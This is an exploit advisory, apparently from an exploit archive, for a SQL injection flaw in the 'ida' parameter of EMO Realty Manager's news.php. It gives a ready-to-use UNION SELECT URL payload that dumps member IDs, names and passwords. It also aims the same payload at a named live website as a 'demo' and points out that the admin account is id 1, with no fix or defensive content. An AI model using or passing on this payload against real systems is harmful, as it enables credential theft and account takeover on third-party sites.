EMO Realty Manager (news.php ida) SQL Injection Vulnerability

2008-05-13 00:00:00

##########################################################
# Remote SQL Injection Vulnerabilities #
# EMO Realty Manager #
##########################################################


## Author : HaCkeR_EgY

## C0NTACT : [email protected]


## H^OME : www.PAL-HaCkeR.com & ATSDP.COM


## Script Name : EMO Realty Manager


## Download : http://www.emophp.com/


## Price : Manager Full License CAD $399 /// Manager Base License CAD $299=======> Buy iT : http://www.emophp.com/purchase.php


###########################################################################
###########################################################################

## D0rk : mmmm...... U have 2 dork ...Let's say use your Mind again D:


## ExPlo!T :

=====>> http://target.com/path/pages/news.php?ida=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,id,member_name,member_password),4/**/from/**/members/*
## L!ve Dem0 :


======>>http://sellrentcanada.com/aaa/pages/news.php?ida=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,id,member_name,member_password),4/**/from/**/members/*

-----N0TE---- Admin INFO have (id) number 1


################################################################################

[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "

[<>] Greetz : Mr.SQL , Mohamed el Arab ,F!resell, DaRk MaStEr , H-T Team , Stack-Terrorist

#################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.